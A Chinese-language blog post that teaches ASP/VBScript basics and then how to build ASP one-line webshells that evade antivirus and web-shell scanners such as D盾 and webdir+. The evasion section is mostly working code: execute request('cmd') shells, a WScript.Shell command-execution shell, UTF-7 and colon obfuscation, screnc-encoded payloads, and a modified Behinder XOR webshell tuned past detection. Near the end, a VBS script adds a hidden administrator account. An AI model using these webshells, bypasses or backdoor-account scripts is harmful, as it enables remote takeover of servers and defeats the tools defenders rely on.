ASP其实是非常灵活的一种语言。说来惭愧,直没有接触过VBS/ASP的相关学习,遇上的很少,不超过5次吧,但是考虑到要成为一个全面的人,因此花了点时间总结下。

ASP和VBS一个运行在服务端,一个运行在客户端,有个别函数用法不同,其他都差不多。
学习了之后我们可以使用在bypass客户端来进行一些操作,如添加用户等,可以bypass服务端学习asp一句话免杀,IIS服务器默认可运行asp服务端脚本。

一、基础语法

1、取值

  1. //dim定义,可以定义函数,布尔,数字,整形
  2. Dim str: str="xxx"
  3. dim str as sssss
  4. Dim name,age
  5. name="111"
  6. age="18"
  8. //set也是赋值,但是一般是给特殊的数据类型
  9. set conn=server.createobject("adodb.connection")
  11. //定义数组
  12. dim a(5)
  14. //从get取值
  15. request.querystring("name")
  16. request()
  17. request.item("c")
  19. //从post取值
  20. request.form("lname")
  21. //从cookie
  22. Request.Cookies("firstname")
  24. DIM一般用于声明变量,如:dim 变量名 as 数据类型
  25. SET一般用于给一些特殊的数据类型赋值

2、定义函数

  1. Function b():
  2.     response.write("xxxx")
  3. End Function
  5. b()

3、创造类

  1. Class myclass
  2.     Private Sub Class_Initialize  //类开始时执行的方法
  3.         response.write("xxxx")
  4.     End Sub
  6.     private sub class_terminate()  //类结束的方法
  7.         response.write "类结束了<br>"
  8.     End sub
  10. End Class

4、循环

  1. <%
  2. dim i
  3. i=0
  4. dim sum
  5. sum=0
  7. for i=1 to 10
  8.     sum=sum+i
  9.     response.write(sum&chr(10) )
  10. next 
  11. %>

5、创造组件实例

如下所示,asp的一些功能需要调用实例,这个有点类似于其他语言里面的导包

  1. Server.CreateObject("Scripting.FileSystemObject") //调用文件控制组件
  2. Server.CreateObject("Scripting.Dictionary")  //调用键值对对象
  3. CreateObject("WScript.Shell")  //调用wscript组件,利用它可以操作注册表,执行命令等
  5. 如下代码直接放入1.vbs执行便会弹出计算机,在Web端也会弹出计算器在任务管理器里,但是不会直接看到
  6.     dim oShell,cmd
  7.     Set oShell = CreateObject("WSCript.shell")
  8.     cmd="calc.exe"
  9.     call oShell.exec(cmd)

6、文字处理函数

  1. 函数    描述
  2. InStr    返回字符串在另一字符串中首次出现的位置。检索从字符串的第一个字符开始。
  3. InStrRev    返回字符串在另一字符串中首次出现的位置。检索从字符串的最末字符开始。
  4. LCase    把指定字符串转换为小写。
  5. Left    从字符串的左侧返回指定数目的字符。
  6. Len    返回字符串中的字符数目。
  7. LTrim    删除字符串左侧的空格。
  8. RTrim    删除字符串右侧的空格。
  9. Trim    删除字符串左侧和右侧的空格。
  10. Mid    从字符串返回指定数目的字符。
  11. Replace    使用另外一个字符串替换字符串的指定部分指定的次数。
  12. Right    返回从字符串右侧开始指定数目的字符。
  13. Space    返回由指定数目的空格组成的字符串。
  14. StrComp    比较两个字符串,返回代表比较结果的一个值。
  15. String    返回包含指定长度的重复字符的字符串。
  16. StrReverse    反转字符串。
  17. UCase    把指定的字符串转换为大写。

二、ASP的脚本引擎能力

Asp具备管理不同语言脚本程序的能力,能够自动调用合适的脚本引擎以解释脚本代码和执行内置函数。Asp开发环境提供了两种脚本引擎,即vbscript(默认)和Jscript(注意这里是JScript,而不是javascript,不过都差不多,只不过一个是微软自己开发的),当然你也可以调用javascript,甚至Perl等脚本语言(需要安装扩展)。

  1. 如下脚本,就是使用asp脚本调用了javascript的引擎,从而可以执行特定的脚本,如果删掉第一行,那么该服务端就会报错。
  3. <%@ language="javascript" %>
  4. <!DOCTYPE html>
  5. <html>
  6. <head>
  7. <%
  8. function jsproc(num1,num2)
  9.     {
  10.     Response.Write(num1*num2)
  11.     }
  12. %>
  13. </head>
  14. <p>Result: <%jsproc(3,4)%></p>
  15. </html>

如下代码,使用了javascript引擎,而javascript引擎对大小写敏感,如1.asp此时就会报错,而2.asp此时就不会

  1. 错误的,因为没有使用完整的大小写
  2. <%@ language="javascript" %>
  3. <%
  4. response.write("Hello World!")
  5. %>
  8. 正确的
  9. <%@ language="Javascript" %>
  10. <%
  11. Response.Write("Hello World!")
  12. /*asdasasdasda
  13. d*/
  14. %>
  1. 正确的
  3. <%@ language="vbs" %>
  4. <%
  5. reSponsE.wRite("Hello World!")
  6. %>

1、默认支持的标签

  1. ASP脚本中的代码块一般被包裹在<% %>标签中,默认以VBscript语言进行解释。引号可以去掉。
  2. <script language="VBScript" runat="server"> 
  3.     xxxx
  4. </script>
  6. <script language=vbs runat=server>
  7.     xxx
  8. </script>
  11. <%@ language=vbs %>
  12. <%@ language="VBscript" %>
  13. <%@ LANGUAGE = VBScript.Encode %>

2、注释

  1. '           单引号     (单行注释)
  2. REM         rem+空格   (单行注释)
  3. //          双斜线      (单行注释,VBscript,JScript可用,仅支持IIS)
  4. <!-- -->    HTML注释符  (单行注释,VBscript可用,仅支持IIS)
  5. /* */       多行注释符 (多行注释,JScript可用)

三、ASP和ASPX之间没有的小玩意

ASP和ASPX的关系处于纠缠态的,有时候含糊不清,虽然不影响大家RCE。
关于ASP和ASPX的一个简单说明

1、aspx不能执行asp相关语法,asp也不可以执行aspx的语法(除了个别一样的函数)

  1. <%
  2. dim aaa
  3. aaa="sdasdasda"
  4. //for i=1 to 10
  5. //response.write(time())
  6. response.write(aaa)
  7. Response.Write(DateTime.Now.Date.ToShortDateString())
  8. %>
  9. //如上面的dim这种是支持在aspx下运行的,但是其他的就都不行了,例如for循环

image.png
image.png
3、分号的问题
asp默认语法是不支持分号的,一个分号也不行,只有@language=jscript之类的前缀的支持分号。

4、aspx后缀+无前缀说明支持REM注释
在这种情况下,aspx后缀支持rem xxx和单引号来进行注释,不支持// , /**/ , <!—>
如下所示

  1. <%
  2. dim aaa
  3. aaa="sdasdasda"
  4. response.write(aaa)
  6. Response.Write("Test")
  8. rem asdasdasdasdsaasdasdasdas
  9. ' asdasdasd
  10. %>

image.png
这个特性我不知道有啥用,aspx后缀支持asp的注释却又不支持asp的语法,而想要用aspx的语法又必须加上c#,加上c#后又不能支持asp的注释了。

4、aspx不必闭合
asp不闭合就报错了,而如果使用的是aspx后缀

  1. <%execute request("cmd")%>

四、ASP一句话木马免杀

ASP执行下面这三个函数的时候,其实就是将传入的字符串内容将asp语法进行戒子,一句话连接的时候,会再调用真正命令执行的函数,类似PHP中的eval调用system。
ExecuteGlobal
eval
execute 

  1. <%execute request("cmd")%>

1、换行分割

如下所示,和其他语言不同的是不可以直接换行,而是需要在换行的“点”处添加“_”符号,如下

  1. response.write("iceice")
  3. Response._
  4. Write("iceice")
  6. Response._
  7. _
  8.  _
  9. Write("iceice")

2、拼接特性

对于包裹在双引号里面的字符串,可以支持拼接,例如,并且asp支持chr类型替换所有的字符,因此可以的避免某些request.item(“c”)字符串关键字

  1. Response.Write("Test"++++++"asdasdas"&"cccccccccccccccc"&""&chr(97))

image.png

3、使用EVAL的命令执行

使用eval的话实际上还是调用wscript.shell来执行命令,类似于php里的system

  1. <%
  2. set stm=server.CreateObject("adodb.stream")
  4. set oScript =CreateObject("WSCRIPT.SHELL")
  5. dim file
  6. file="C:\\ProgramData\\1.txt"
  7. dim command 
  8. command=request("command")
  9. call oScript.run("cmd.exe /c " & command&" > " & file, 0, True)
  10. '命令执行
  12. stm.Type=2
  13. stm.mode=3
  14. stm.charset="gbk"
  15. 'stm.charset="utf-8"
  16. stm.open
  17. stm.loadfromfile(file)
  18. str=stm.readtext
  19. stm.Close
  20. Response.Write(str)
  21. %>

image.png
像这种方式的Webshell 在D盾是没有“记录在案”的,但是值得注意的是,使用上面这种方式执行CALC的话,在我本地直接把IIS服务搞崩了,大概原因可能是执行这类命令后台回等待calc的结束,只有关掉后才能继续运行。
image.png

关于wscript.shell里的run和exec的区别
https://www.cnblogs.com/swek/articles/4337999.html

4、奇怪的冒号

:代表另起一行。
就是指上一条语句执行完毕。
一个奇怪的启发,asp作为容错性特别低的语言,一旦有些奇奇怪怪的东西就会影响这个语句的解析,但是发现:::::在语句前后后加入,并不会影响其解析;而:::ssssasdas::::也不会影响解析,目前测试过eval这类函数除外

  3. <%
  4. :::::execute(request("cmd"))::::::::::xasdasdas::::::::::asdasdas::::::::x:
  5. :::::adasdasd::
  6. :::::adasdasd::response.write("asdsad"):::::adasdasd::
  7. ::::sss:adasdasd::now():::::adasdasd::
  8. %>

具体表现形式如下所示
image.png

ASP的编码特性

https://blog.csdn.net/weixin_40133121/article/details/108595440
codepage=936 简体中文gbk
codepage=950 繁体中文big5
codepage=437 美国/加拿大英语
codepage=932 日文
codepage=949 韩文
codepage=866 俄文
codepage=65001 unicode uft-8

UTF7特性

image.png
asp语法支持utf-7编码,65000为指定utf7-的编码模式

  1. <%@codepage=65000%>
  2. <%r+k-es+k-p+k-on+k-se.co+k-d+k-e+k-p+k-age=936:e+k-v+k-a+k-l r+k-e+k-q+k-u+k-e+k-s+k-t("cmd")%>

如下所示,Utf-7如果遇到+xx- 且xx的长度不超过2,则会变为空字符

  1. <%@codepage=65000%>
  2. <%e+ss-v+k-a+k-l r+k-e+ka-q+k-u+k-e+kd-s+ks-t("cmd")+xx-+xx-+xx-+x-%>

也可以变为下面这种格式的UTF-7

  1. <%
  2. execute request("cmd")
  3. %>
  5. 变为
  7. <%@codepage=65000%>
  8. <%
  9. +AGUAeABlAGMAdQB0AGUAIAByAGUAcQB1AGUAcwB0ACgAIgBjAG0AZAAiACk-
  10. %>

可以将上述两者进行结合,加上@@@来绕过,D盾也检测不出来。

  1. <%@@@@@@@@@@codepage=65000%>
  2. <%
  3. +AGUAdgBhAGw-(r+k-e+k-q+k-u+k-e+k-s+k-t("cmd"))
  4. %>

image.png

_UTF-7 编码解码工具.rar

SCRENC工具

screnc 是来自微软的原生加密工具,但是我找到该工具使用的时候,我怎么用也用不了。
http://bcn.bathome.net/s/tool/index.html?key=screnc

  1. MsgBox 123
  2. 将变成
  3. #@~^CgAAAA==\ko$K6,F 2BgMAAA==^#~@ 
  5. 使用这类Webshell时需要添加标头前缀
  6. <script language="VBScript.Encode">
  7. #@~^KQAAAA==@#@&j1D
  8. bwYc214W,J3x1W[roPbdP1WW^ZZJ@#@&PQsAAA==^#~@</script>

ASP对如果在文件头声明中发现VBScript.Encode,同时在之后的内容中检测到#@~^ ….. ^#~@
则自动对#@~^(…..内容)^#~@中的密文进行解密并解释执行

字符串处理工具

混淆工具:https://github.com/sevagas/macro_pack

冰蝎asp脚本简单修改

该脚本在3.0 beta 6可以成功连接,在3.7乃至最新版都连接不了(天蝎shell管理也可以加密连上)

  1. <%
  2. Response.CharSet = "UTF-8" 
  3. k="e45e329feb5d925b" '该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
  4. Session("k")=k
  5. size=Request.TotalBytes
  6. content=Request.BinaryRead(size)
  7. For i=1 To size
  8. result=result&Chr(ascb(midb(content,i,1)) Xor Asc(Mid(k,(i and 15)+1,1)))
  9. Next
  10. execute(result)
  11. %>

D盾检测冰蝎实在是离谱,居然检测的是关键字result,将result改为r就绕过了,着实无语

  1. <%
  2. Response.CharSet = "UTF-8" 
  3. k="e45e329feb5d925b" '该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
  4. Session("k")=k
  5. size=Request.TotalBytes
  6. content=Request.BinaryRead(size)
  8. For i=1 To size
  9. r=r&Chr(ascb(midb(content,i,1)) Xor Asc(Mid(k,(i and 15)+1,1)))
  10. Next
  11. execute(r)
  12. %>

接着Bypass webdir+ ,经过定位多次后定位到了这一句
r=r&Chr(ascb(midb(content,i,1)) Xor Asc(Mid(k,(i and 15)+1,1)))
对于asp并没有那么高科技的语法树支持,因此只需简单去掉一些关键字即可

  1. <%
  2. Response.CharSet = "UTF-8" 
  3. k="e45e329feb5d925b" 
  4. Session("k")=k
  5. size=Request.TotalBytes
  6. content=Request.BinaryRead(size)
  7. For i=1 To size
  8. z=Asc(Mid(k,(i and 15)+1,1))
  9. c=ascb(midb(content,i,1))
  10. r=r&Chr( c Xor z)
  11. Next
  12. execute(r)
  13. %>

image.png
并且,上面bypass使用的还只是最简单的字符替换,我们之前学的特性,拼接,换行,以及自定义方法,数组,字符处理函数,UTF-7还都一个都没有用呢,这些组合起来相信短时间内可以Bypass市面上所有针对asp的waf了。
相比aspx,针对asp的免杀的确是小了很多。

wscript和cscript的区别

都可以直接在客户端上运行VBS脚本,区别在于一个使用框框弹出来,一个使用控制台打印出来
image.pngimage.png

再简单介绍一个VBS脚本吧,VBS的语法和ASP的语法是一样的,我们可以通过调用一些函数来操作系统API。

  1. Set wsnetwork=CreateObject("WS"&"CR"&"IPT"&"."&"NET"&"WO"&"RK") 
  2. os="WinNT://"&wsnetwork.ComputerName
  3. Set ob=GetObject(os)
  4. Set oe=GetObject(os&"/Administrators,group")
  5. Set od=ob.Create("user","iiice")
  6. Const strPassword = "123456"
  7. od.SetPassword strPassword
  8. od.SetInfo
  9. Set of=GetObject(os&"/iiice",user)
  10. oe.add os&"/iiice"

查看3389

  1. Dim ReadComputerName 
  2. Set ReadComputerName=WScript.CreateObject("WScript.Shell") 
  3. Dim TSName,TSRegPath 
  4. TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber" 
  5. TSName=ReadComputerName.RegRead(TSRegPath) 
  6. WScript.Echo("TermService port is:"&TSName)

参考资料

https://www.w3school.com.cn/asp/asp_syntax.asp
https://xz.aliyun.com/t/5193
https://xz.aliyun.com/t/2356